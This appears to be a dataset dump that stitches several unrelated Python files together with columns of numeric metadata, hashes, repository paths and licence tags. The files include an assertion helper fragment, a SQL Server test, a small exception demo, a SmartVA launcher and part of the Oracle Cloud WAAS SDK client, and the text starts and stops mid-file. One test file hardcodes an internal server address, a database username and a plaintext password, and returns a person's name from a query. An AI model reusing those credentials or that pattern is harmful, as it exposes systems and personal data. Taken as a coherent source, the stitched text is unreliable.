assert_float_lists_not_equal: lists [1] and [2,3] are not comparable
"""
number = [float, int] # list of number types
if type(expected) != list:
msg = ("assert_float_lists_not_equal: " +
"first argument " + repr(expected) +" is not a list")
quit_with_error(msg)
if type(received) != list:
msg = ("assert_float_lists_not_equal: " +
"second argument " + repr(received) +" is not a list")
quit_with_error(msg)
if len(expected) != len(received):
msg = ('assert_float_lists_equal: lists ' + repr(expected) +
' and ' + repr(received)+' have different sizes')
quit_with_error(msg)
try:
if (numpy.allclose([expected],[received])):
msg = ('assert_floats_not_equal: expected something different from' +
repr(expected))
quit_with_error(msg)
except:
msg = ('assert_float_lists_not_equal: lists ' + repr(expected) +
' and ' + repr(received)+' are not comparable')
quit_with_error(msg)
| 37.704348
| 100
| 0.652675
| 1,733
| 13,008
| 4.810156
| 0.124639
| 0.023752
| 0.03275
| 0.036468
| 0.861324
| 0.853167
| 0.836012
| 0.81406
| 0.763076
| 0.744842
| 0
| 0.003719
| 0.276445
| 13,008
| 345
| 101
| 37.704348
| 0.881959
| 0.017066
| 0
| 0.638655
| 0
| 0
| 0.232472
| 0.068873
| 0
| 0
| 0
| 0
| 0.235294
| 0
| null | null | 0
| 0.016807
| null | null | 0.02521
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58e58a3dbbe9af64219d4b94431e463fd2160fe7
| 1,514
|
py
|
Python
|
tests/features/test_sqlserver.py
|
alexgarzao/beeweb
|
c67d024c2d43c6bb2da7ba6877c1648e8760f036
|
[
"MIT"
] | 5
|
2017-11-10T12:48:10.000Z
|
2018-02-21T21:29:52.000Z
|
tests/features/test_sqlserver.py
|
alexgarzao/beeweb
|
c67d024c2d43c6bb2da7ba6877c1648e8760f036
|
[
"MIT"
] | 1
|
2018-04-22T00:08:16.000Z
|
2018-04-22T00:08:16.000Z
|
tests/features/test_sqlserver.py
|
alexgarzao/beeweb
|
c67d024c2d43c6bb2da7ba6877c1648e8760f036
|
[
"MIT"
] | 2
|
2017-11-10T17:06:34.000Z
|
2017-11-11T03:27:46.000Z
|
from .context import SqlServer
def test_query_with_many_fields():
q = SqlServer()
q.server_address = '10.64.100.213'
q.username = 'cob_user'
q.user_password = 'tecnocred'
q.database_name = 'COB_IS_3'
q.sql = """
SELECT top 1 ben.nm_beneficiario, vc.ds_variacao_carteira, c.ds_carteira
FROM cob_variacao_carteira vc
JOIN cob_beneficiario_variacao_carteira bvc
ON (bvc.cd_variacao_carteira = vc.cd_variacao_carteira)
JOIN cob_beneficiario ben
ON (ben.cd_beneficiario = bvc.cd_beneficiario)
JOIN cob_carteira c ON (c.cd_carteira = bvc.cd_carteira)
WHERE c.id_modalidade_carteira = 10
AND ben.cd_coop = 4022
"""
q.field_name = 'nm_beneficiario'
assert q.query() == 'Mirian Gomes'
def test_query_with_one_field():
q = SqlServer()
q.server_address = '10.64.100.213'
q.username = 'cob_user'
q.user_password = 'tecnocred'
q.database_name = 'COB_IS_3'
q.sql = """
SELECT top 1 ben.nm_beneficiario
FROM cob_variacao_carteira vc
JOIN cob_beneficiario_variacao_carteira bvc
ON (bvc.cd_variacao_carteira = vc.cd_variacao_carteira)
JOIN cob_beneficiario ben
ON (ben.cd_beneficiario = bvc.cd_beneficiario)
JOIN cob_carteira c ON (c.cd_carteira = bvc.cd_carteira)
WHERE c.id_modalidade_carteira = 10
AND ben.cd_coop = 4022
"""
assert q.query() == 'Mirian Gomes'
| 35.209302
| 78
| 0.649934
| 206
| 1,514
| 4.470874
| 0.257282
| 0.156352
| 0.078176
| 0.034745
| 0.857763
| 0.807818
| 0.807818
| 0.807818
| 0.807818
| 0.807818
| 0
| 0.032345
| 0.264861
| 1,514
| 42
| 79
| 36.047619
| 0.795148
| 0
| 0
| 0.842105
| 0
| 0
| 0.703435
| 0.184941
| 0
| 0
| 0
| 0
| 0.052632
| 1
| 0.052632
| false
| 0.052632
| 0.026316
| 0
| 0.078947
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
4530934cb88a0314da46a5b36e24ed4a92573217
| 276
|
py
|
Python
|
python/try.py
|
wjiec/packages
|
4ccaf8f717265a1f8a9af533f9a998b935efb32a
|
[
"MIT"
] | null | null | null |
python/try.py
|
wjiec/packages
|
4ccaf8f717265a1f8a9af533f9a998b935efb32a
|
[
"MIT"
] | 1
|
2016-09-15T07:06:15.000Z
|
2016-09-15T07:06:15.000Z
|
python/try.py
|
wjiec/packages
|
4ccaf8f717265a1f8a9af533f9a998b935efb32a
|
[
"MIT"
] | null | null | null |
#!/bin/env python3
try:
invalid = 10 / 0
except ZeroDivisionError as e:
print('catch except: ', e)
finally:
print('finally...')
try:
invalid = 10 / 1
except ZeroDivisionError as e:
print('catch except: ', e)
finally:
print('finally...')
| 18.4
| 31
| 0.59058
| 33
| 276
| 4.939394
| 0.454545
| 0.122699
| 0.147239
| 0.319018
| 0.760736
| 0.760736
| 0.760736
| 0.760736
| 0.760736
| 0.760736
| 0
| 0.034483
| 0.264493
| 276
| 15
| 32
| 18.4
| 0.768473
| 0.061594
| 0
| 0.833333
| 0
| 0
| 0.195918
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
18d16473d15ff59cf6350585ba3622682cc43a86
| 173
|
py
|
Python
|
smartva/__main__.py
|
rileyhazard/SmartVA-Analyze-1
|
0573eeff27d03f54e7506db4f1631c0cd9f54bbb
|
[
"MIT"
] | 4
|
2019-01-23T12:57:47.000Z
|
2020-04-18T17:13:08.000Z
|
smartva/__main__.py
|
rileyhazard/SmartVA-Analyze-1
|
0573eeff27d03f54e7506db4f1631c0cd9f54bbb
|
[
"MIT"
] | 4
|
2019-01-09T22:10:07.000Z
|
2022-02-16T04:57:06.000Z
|
smartva/__main__.py
|
rileyhazard/SmartVA-Analyze-1
|
0573eeff27d03f54e7506db4f1631c0cd9f54bbb
|
[
"MIT"
] | 11
|
2018-12-11T22:01:13.000Z
|
2022-01-07T11:38:02.000Z
|
import sys
if __name__ == '__main__':
if len(sys.argv) > 1:
from smartva import va_cli as app
else:
from smartva import va_ui as app
app.main()
| 19.222222
| 41
| 0.612717
| 27
| 173
| 3.555556
| 0.592593
| 0.229167
| 0.354167
| 0.395833
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008333
| 0.306358
| 173
| 8
| 42
| 21.625
| 0.791667
| 0
| 0
| 0
| 0
| 0
| 0.046243
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.428571
| 0
| 0.428571
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
18f0e3a4faebcad3be13c771b1d79c841c45f250
| 372,273
|
py
|
Python
|
src/oci/waas/waas_client.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/waas/waas_client.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/waas/waas_client.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from __future__ import absolute_import
from oci._vendor import requests # noqa: F401
from oci._vendor import six
from oci import retry, circuit_breaker # noqa: F401
from oci.base_client import BaseClient
from oci.config import get_config_value_or_default, validate_config
from oci.signer import Signer
from oci.util import Sentinel, get_signer_from_authentication_type, AUTHENTICATION_TYPE_FIELD_NAME
from .models import waas_type_mapping
missing = Sentinel("Missing")
class WaasClient(object):
"""
OCI Web Application Acceleration and Security Services
"""
def __init__(self, config, **kwargs):
"""
Creates a new service client
:param dict config:
Configuration keys and values as per `SDK and Tool Configuration <https://docs.cloud.oracle.com/Content/API/Concepts/sdkconfig.htm>`__.
The :py:meth:`~oci.config.from_file` method can be used to load configuration from a file. Alternatively, a ``dict`` can be passed. You can validate_config
the dict using :py:meth:`~oci.config.validate_config`
:param str service_endpoint: (optional)
The endpoint of the service to call using this client. For example ``https://iaas.us-ashburn-1.oraclecloud.com``. If this keyword argument is
not provided then it will be derived using the region in the config parameter. You should only provide this keyword argument if you have an explicit
need to specify a service endpoint.
:param timeout: (optional)
The connection and read timeouts for the client. The default values are connection timeout 10 seconds and read timeout 60 seconds. This keyword argument can be provided
as a single float, in which case the value provided is used for both the read and connection timeouts, or as a tuple of two floats. If
a tuple is provided then the first value is used as the connection timeout and the second value as the read timeout.
:type timeout: float or tuple(float, float)
:param signer: (optional)
The signer to use when signing requests made by the service client. The default is to use a :py:class:`~oci.signer.Signer` based on the values
provided in the config parameter.
One use case for this parameter is for `Instance Principals authentication <https://docs.cloud.oracle.com/Content/Identity/Tasks/callingservicesfrominstances.htm>`__
by passing an instance of :py:class:`~oci.auth.signers.InstancePrincipalsSecurityTokenSigner` as the value for this keyword argument
:type signer: :py:class:`~oci.signer.AbstractBaseSigner`
:param obj retry_strategy: (optional)
A retry strategy to apply to all calls made by this service client (i.e. at the client level). There is no retry strategy applied by default.
Retry strategies can also be applied at the operation level by passing a ``retry_strategy`` keyword argument as part of calling the operation.
Any value provided at the operation level will override whatever is specified at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
:param obj circuit_breaker_strategy: (optional)
A circuit breaker strategy to apply to all calls made by this service client (i.e. at the client level).
This client uses :py:data:`~oci.circuit_breaker.DEFAULT_CIRCUIT_BREAKER_STRATEGY` as default if no circuit breaker strategy is provided.
The specifics of circuit breaker strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/circuit_breakers.html>`__.
:param function circuit_breaker_callback: (optional)
Callback function to receive any exceptions triggerred by the circuit breaker.
:param allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this client should allow control characters in the response object. By default, the client will not
allow control characters to be in the response object.
"""
validate_config(config, signer=kwargs.get('signer'))
if 'signer' in kwargs:
signer = kwargs['signer']
elif AUTHENTICATION_TYPE_FIELD_NAME in config:
signer = get_signer_from_authentication_type(config)
else:
signer = Signer(
tenancy=config["tenancy"],
user=config["user"],
fingerprint=config["fingerprint"],
private_key_file_location=config.get("key_file"),
pass_phrase=get_config_value_or_default(config, "pass_phrase"),
private_key_content=config.get("key_content")
)
base_client_init_kwargs = {
'regional_client': True,
'service_endpoint': kwargs.get('service_endpoint'),
'base_path': '/20181116',
'service_endpoint_template': 'https://waas.{region}.oci.{secondLevelDomain}',
'skip_deserialization': kwargs.get('skip_deserialization', False),
'circuit_breaker_strategy': kwargs.get('circuit_breaker_strategy', circuit_breaker.GLOBAL_CIRCUIT_BREAKER_STRATEGY)
}
if 'timeout' in kwargs:
base_client_init_kwargs['timeout'] = kwargs.get('timeout')
if base_client_init_kwargs.get('circuit_breaker_strategy') is None:
base_client_init_kwargs['circuit_breaker_strategy'] = circuit_breaker.DEFAULT_CIRCUIT_BREAKER_STRATEGY
if 'allow_control_chars' in kwargs:
base_client_init_kwargs['allow_control_chars'] = kwargs.get('allow_control_chars')
self.base_client = BaseClient("waas", config, signer, waas_type_mapping, **base_client_init_kwargs)
self.retry_strategy = kwargs.get('retry_strategy')
self.circuit_breaker_callback = kwargs.get('circuit_breaker_callback')
def accept_recommendations(self, waas_policy_id, protection_rule_keys, **kwargs):
"""
Accepts a list of recommended Web Application Firewall protection rules. Web Application Firewall protection rule recommendations are sets of rules generated by observed traffic patterns through the Web Application Firewall and are meant to optimize the Web Application Firewall's security profile. Only the rules specified in the request body will be updated; all other rules will remain unchanged.
Use the `GET /waasPolicies/{waasPolicyId}/wafConfig/recommendations` method to view a list of recommended Web Application Firewall protection rules. For more information, see `WAF Protection Rules`__.
__ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/wafprotectionrules.htm
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] protection_rule_keys: (required)
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/accept_recommendations.py.html>`__ to see an example of how to use accept_recommendations API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/actions/acceptWafConfigRecommendations"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"accept_recommendations got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=protection_rule_keys)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=protection_rule_keys)
def cancel_work_request(self, work_request_id, **kwargs):
"""
Cancels a specified work request.
:param str work_request_id: (required)
The `OCID`__ of the work request. This number is generated when work request is created.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/cancel_work_request.py.html>`__ to see an example of how to use cancel_work_request API.
"""
resource_path = "/workRequests/{workRequestId}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"cancel_work_request got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def change_address_list_compartment(self, address_list_id, change_address_list_compartment_details, **kwargs):
"""
Moves address list into a different compartment. When provided, If-Match
is checked against ETag values of the address list. For information about moving
resources between compartments, see `Moving Resources to a Different Compartment`__.
__ https://docs.cloud.oracle.com/iaas/Content/Identity/Tasks/managingcompartments.htm#moveRes
:param str address_list_id: (required)
The `OCID`__ of the address list. This number is generated when the address list is added to the compartment.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.ChangeAddressListCompartmentDetails change_address_list_compartment_details: (required)
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/change_address_list_compartment.py.html>`__ to see an example of how to use change_address_list_compartment API.
"""
resource_path = "/addressLists/{addressListId}/actions/changeCompartment"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_address_list_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"addressListId": address_list_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_address_list_compartment_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_address_list_compartment_details)
def change_certificate_compartment(self, certificate_id, change_certificate_compartment_details, **kwargs):
"""
Moves certificate into a different compartment. When provided, If-Match is checked against ETag values of the certificate.
For information about moving resources between compartments, see `Moving Resources to a Different Compartment`__.
__ https://docs.cloud.oracle.com/iaas/Content/Identity/Tasks/managingcompartments.htm#moveRes
:param str certificate_id: (required)
The `OCID`__ of the SSL certificate used in the WAAS policy. This number is generated when the certificate is added to the policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.ChangeCertificateCompartmentDetails change_certificate_compartment_details: (required)
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/change_certificate_compartment.py.html>`__ to see an example of how to use change_certificate_compartment API.
"""
resource_path = "/certificates/{certificateId}/actions/changeCompartment"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_certificate_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"certificateId": certificate_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_certificate_compartment_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_certificate_compartment_details)
def change_custom_protection_rule_compartment(self, custom_protection_rule_id, change_custom_protection_rule_compartment_details, **kwargs):
"""
Moves a custom protection rule into a different compartment within the same tenancy. When provided, If-Match is checked against ETag values of the custom protection rule. For information about moving resources between compartments, see `Moving Resources to a Different Compartment`__.
__ https://docs.cloud.oracle.com/iaas/Content/Identity/Tasks/managingcompartments.htm#moveRes
:param str custom_protection_rule_id: (required)
The `OCID`__ of the custom protection rule. This number is generated when the custom protection rule is added to the compartment.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.ChangeCustomProtectionRuleCompartmentDetails change_custom_protection_rule_compartment_details: (required)
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/change_custom_protection_rule_compartment.py.html>`__ to see an example of how to use change_custom_protection_rule_compartment API.
"""
resource_path = "/customProtectionRules/{customProtectionRuleId}/actions/changeCompartment"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_custom_protection_rule_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"customProtectionRuleId": custom_protection_rule_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
